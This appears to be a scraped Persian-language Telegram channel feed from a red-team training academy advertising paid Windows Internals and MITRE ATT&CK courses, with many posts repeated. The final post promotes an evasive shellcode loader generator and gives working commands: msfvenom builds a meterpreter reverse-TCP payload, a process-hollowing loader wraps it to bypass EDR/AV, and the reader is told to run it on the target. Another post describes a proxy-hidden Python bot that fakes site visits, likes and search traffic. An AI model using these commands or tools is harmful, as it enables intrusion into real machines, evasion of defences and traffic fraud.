ما یکمقدار صبر میکنیم تا دوستان بیشتر بشن
تا شروع کنیم مجدد به فعالیت .
تا اون موقع یک راهی برای نشر مطالب پیدا میکنیم که به عنوان عامل مخرب شناخته نشه .
ارادت
RedTeam Group : @RedTeamAcademyChat
تا شروع کنیم مجدد به فعالیت .
تا اون موقع یک راهی برای نشر مطالب پیدا میکنیم که به عنوان عامل مخرب شناخته نشه .
ارادت
RedTeam Group : @RedTeamAcademyChat
تا بارگذاری تمامی ویدیو ها ، مشخصات و توضیحات در سایت ، برای دسترسی سریع و آسان تر ویدیو ها در کانال بله بارگذاری شده است
کانال بله :
https://ble.ir/RedTeamAPT
کانال بله :
https://ble.ir/RedTeamAPT
ble.ir
بله | کانال RedTeamAPT
Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
Admin : @HopeAPT
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
Admin : @HopeAPT
سلام به همه دوستان !
سایت تا آخر این هفته با کلی تغییرات دوباره بالا میاد! این آپدیتها رو داشتیم:
تکنیکها و متدها کاملاً آپدیت شدن.
ساختار سایت رو با تغییرات جدید MITRE ATT&CK هماهنگ کردیم.
طراحی و سئوی سایت رو بهبود دادیم تا راحتتر ازش استفاده کنید.
همه ویدیوها رو روی خود سایت میذاریم که دیگه نگران بسته شدن کانال تلگرام نباشیم!
یه خبر مهم دیگه: بعد از اینکه دوره Windows Internals تموم بشه، یه دوره کاربردی و جدید بر اساس MITRE ATT&CK داریم.
@RedTeamAcademy
سایت تا آخر این هفته با کلی تغییرات دوباره بالا میاد! این آپدیتها رو داشتیم:
تکنیکها و متدها کاملاً آپدیت شدن.
ساختار سایت رو با تغییرات جدید MITRE ATT&CK هماهنگ کردیم.
طراحی و سئوی سایت رو بهبود دادیم تا راحتتر ازش استفاده کنید.
همه ویدیوها رو روی خود سایت میذاریم که دیگه نگران بسته شدن کانال تلگرام نباشیم!
یه خبر مهم دیگه: بعد از اینکه دوره Windows Internals تموم بشه، یه دوره کاربردی و جدید بر اساس MITRE ATT&CK داریم.
@RedTeamAcademy
Telegram
RedTeamAPT Academy
Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
Group : @RedTeamAcademyChat
Admin : @RedTeamAdmin1
این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
Group : @RedTeamAcademyChat
Admin : @RedTeamAdmin1
این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
یکی از اهدافی که داریم برای سایت در قسمت mitre attack مثالهایی از تکنیک ها هست
ساده و جوری که مخرب نباشه ، اگرم بود راحت شناسایی بشه
برای مثال با پایتون ریورس شل نوشتیم و قرار دادیم
تا در بخش T1059.006: Python شما درک مطلب کاملی داشته باشید
ولی مثال های عملی تر و پیشرفته تر در دوره ها بیان میشه .
@RedTeamAcademy
ساده و جوری که مخرب نباشه ، اگرم بود راحت شناسایی بشه
برای مثال با پایتون ریورس شل نوشتیم و قرار دادیم
تا در بخش T1059.006: Python شما درک مطلب کاملی داشته باشید
ولی مثال های عملی تر و پیشرفته تر در دوره ها بیان میشه .
@RedTeamAcademy
سلام وقت عزیزان بخیر
سایت مجدد در دسترس قرار گرفت
دوره های آموزشی
و اتک های مایتره
https://redteamapt.ir/
سایت مجدد در دسترس قرار گرفت
دوره های آموزشی
و اتک های مایتره
https://redteamapt.ir/
Media is too big
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3
Process
Token
PrimaryToken
ImpersonationToken
فصل 1 و 2 منتشر شده است .
پیش نیاز : دوره ردتیم و اشنایی با c , c++
@RedTeamAcademy
Process
Token
PrimaryToken
ImpersonationToken
فصل 1 و 2 منتشر شده است .
پیش نیاز : دوره ردتیم و اشنایی با c , c++
@RedTeamAcademy
سلام وقت بخیر
نمونه ویدیو آموزشی windows internal فصل ۳ در سایت بارگزاری شد . (اخرین ویدیو صفحه)
بدون vpn سایت رو باز کنید.
ویدیو در رابطه با ساختار
Reverse shell att&ck
PPID ATT&CK
Startupinfo
Startupinfoex
Example c++ code
https://redteamapt.ir/course/%d8%af%d9%88%d8%b1%d9%87-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-windows-internal/
نمونه ویدیو آموزشی windows internal فصل ۳ در سایت بارگزاری شد . (اخرین ویدیو صفحه)
بدون vpn سایت رو باز کنید.
ویدیو در رابطه با ساختار
Reverse shell att&ck
PPID ATT&CK
Startupinfo
Startupinfoex
Example c++ code
https://redteamapt.ir/course/%d8%af%d9%88%d8%b1%d9%87-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-windows-internal/
با سلام و عرض ادب
به علت طولانی بودن و حجم بالای مطالب Windows Internal ، طی 6 مرحله دوره منتشر میشه
قیمت اصلی دوره بین هر فصل تقسیم میشود (اگر قیمت دوره 6 میلیون تومان باشد قیمت هر بخش 1 میلیون تومان میباشد که از لحاظ اقتصادی برای دوستان بهتر هست و فشار سنگین دوره نهایی و خرید کلی رو نداشته باشند ، قیمت دوره پس از انتشار اعلام میشود)
نحوه انتشار دوره Windows Internal :
فصل 1 و 2 : Concepts and tools , System architecture
فصل 3 : Processes and jobs
فصل 4 : Threads
فصل 5 : Memory management
فصل 6 : I/O system
فصل 7 : Security
این کار به علت این است که عزیزان بتوانند طی بازه هایی که زمان هست تا انتشار فصل بعدی فرصت مطالعه داشته باشند و تست های بسیاری در هر فصل وجود دارد به همراه کد هایی که در هر تست انجام میشه .
هر بخش حدود بین 100 تا 150 صفحه از کتاب هست .
دوره شامل سرفصل ها و تیتر های اصلی کتاب هست و تا حد ممکن کامل تر نیز شده است
در تمام دوره ما مثال و توضیحات Red Team و attack میزنیم .
کل دوره بین 80 تا 100 ساعت هست .
اگر استقبال ازین دوره خوب باشه در نظر دارم دوره هایی که تو ایران (اصلا نیست) و جهان اصلا شاید پیدا نکنید برگزار کنم :
Windows Internals Part 2
Windows 10 System Programming, Part 1
Windows 10 System Programming, Part 2
Windows Kernel Programming
windows-via-C and C++
فصل 1 و 2 دوره منتشر شده دوستان میتوانند از لینک زیر نمونه ویدیو های دوره ببینید (بدون VPN)
دوره آموزشی Windows Internal
فصل 3 در اواسط ضبط هستش و احتمالا تا اوایل ماه دیگه منتشر بشه
دوره های آموزشی اکادمی RedTeamAPT
——————-
@RedTeamAcademy
به علت طولانی بودن و حجم بالای مطالب Windows Internal ، طی 6 مرحله دوره منتشر میشه
قیمت اصلی دوره بین هر فصل تقسیم میشود (اگر قیمت دوره 6 میلیون تومان باشد قیمت هر بخش 1 میلیون تومان میباشد که از لحاظ اقتصادی برای دوستان بهتر هست و فشار سنگین دوره نهایی و خرید کلی رو نداشته باشند ، قیمت دوره پس از انتشار اعلام میشود)
نحوه انتشار دوره Windows Internal :
فصل 1 و 2 : Concepts and tools , System architecture
فصل 3 : Processes and jobs
فصل 4 : Threads
فصل 5 : Memory management
فصل 6 : I/O system
فصل 7 : Security
این کار به علت این است که عزیزان بتوانند طی بازه هایی که زمان هست تا انتشار فصل بعدی فرصت مطالعه داشته باشند و تست های بسیاری در هر فصل وجود دارد به همراه کد هایی که در هر تست انجام میشه .
هر بخش حدود بین 100 تا 150 صفحه از کتاب هست .
دوره شامل سرفصل ها و تیتر های اصلی کتاب هست و تا حد ممکن کامل تر نیز شده است
در تمام دوره ما مثال و توضیحات Red Team و attack میزنیم .
کل دوره بین 80 تا 100 ساعت هست .
اگر استقبال ازین دوره خوب باشه در نظر دارم دوره هایی که تو ایران (اصلا نیست) و جهان اصلا شاید پیدا نکنید برگزار کنم :
Windows Internals Part 2
Windows 10 System Programming, Part 1
Windows 10 System Programming, Part 2
Windows Kernel Programming
windows-via-C and C++
فصل 1 و 2 دوره منتشر شده دوستان میتوانند از لینک زیر نمونه ویدیو های دوره ببینید (بدون VPN)
دوره آموزشی Windows Internal
فصل 3 در اواسط ضبط هستش و احتمالا تا اوایل ماه دیگه منتشر بشه
دوره های آموزشی اکادمی RedTeamAPT
——————-
@RedTeamAcademy
This media is not supported in your browser
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3
به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست
دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید
فصل 1 و 2 دوره منتشر شده است
@RedTeamAcademy
به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست
دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید
فصل 1 و 2 دوره منتشر شده است
@RedTeamAcademy
تمامی کد ها و نوت ها ب دوستان تو همه دوره ها ارسال میشه
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!
@RedTeamAcademy
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!
@RedTeamAcademy
دیشب داشتم روی یه چیزی کار میکردم با پایتون
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....
بماند که من این رو برای یه کاری درست کردم😎
@RedTeamAcademy
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....
بماند که من این رو برای یه کاری درست کردم😎
@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM
RedTeam 🔴 vs 🔵 BlueTeam
دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .
@RedTeamAcademy
دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .
@RedTeamAcademy
جنگ واقعی RedTeam و BlueTeam اینجا رخ میده .
بخشی از دوره Windows Internal فصل 3
دوره آموزشی Windows Internal
@RedTeamAcademy
بخشی از دوره Windows Internal فصل 3
دوره آموزشی Windows Internal
@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM
قانون تغییرناپذیری (Immutability) :
تمام فیلدهای درون یک توکن به دلیل قرار داشتن در حافظه کرنل کاملاً غیرقابل تغییر (Immutable) هستند. هیچکدام از امتیازات یا SIDها از لایه کاربر (User Mode) قابل دستکاری نیستند، مگر از طریق سیستمکالهای رسمی و مجاز که خود سیستمعامل برای این کار تعبیه کرده است.
رد تیمر : 👀
👇مشاهده دوره های آموزشی
🔗 https://redteamapt.ir/course/
@RedTeamAcademy 🚫
@RedTeamAcademy
🔴 لودر شلکد فوقالعاده گریزناپذیر برای Red Team
یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب میشه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شلکد دلخواه با حداقل ردپا و حداکثر پنهانکاری در سیستم هدف است.
قابلیتهای کلیدی:
- تولید لودرهای شلکد گریزناپذیر با تکنیکهای پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روشهای تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهمسازی (Obfuscation) قوی شلکد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیکهای پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشتهشده با C/C++ برای کنترل سطح پایین و عملکرد بهینه
نحوه استفاده:
لودر تولیدشده (
---
🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir
یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب میشه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شلکد دلخواه با حداقل ردپا و حداکثر پنهانکاری در سیستم هدف است.
قابلیتهای کلیدی:
- تولید لودرهای شلکد گریزناپذیر با تکنیکهای پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روشهای تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهمسازی (Obfuscation) قوی شلکد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیکهای پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشتهشده با C/C++ برای کنترل سطح پایین و عملکرد بهینه
نحوه استفاده:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw -o payload.bin
.\Rattle.exe -s payload.bin -t hollow -o loader.exe
# -e : فعالسازی encryption
# -u : فعالسازی unhooking
لودر تولیدشده (
loader.exe) رو روی هدف اجرا کنید و لذت ببرید! 🚀---
🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir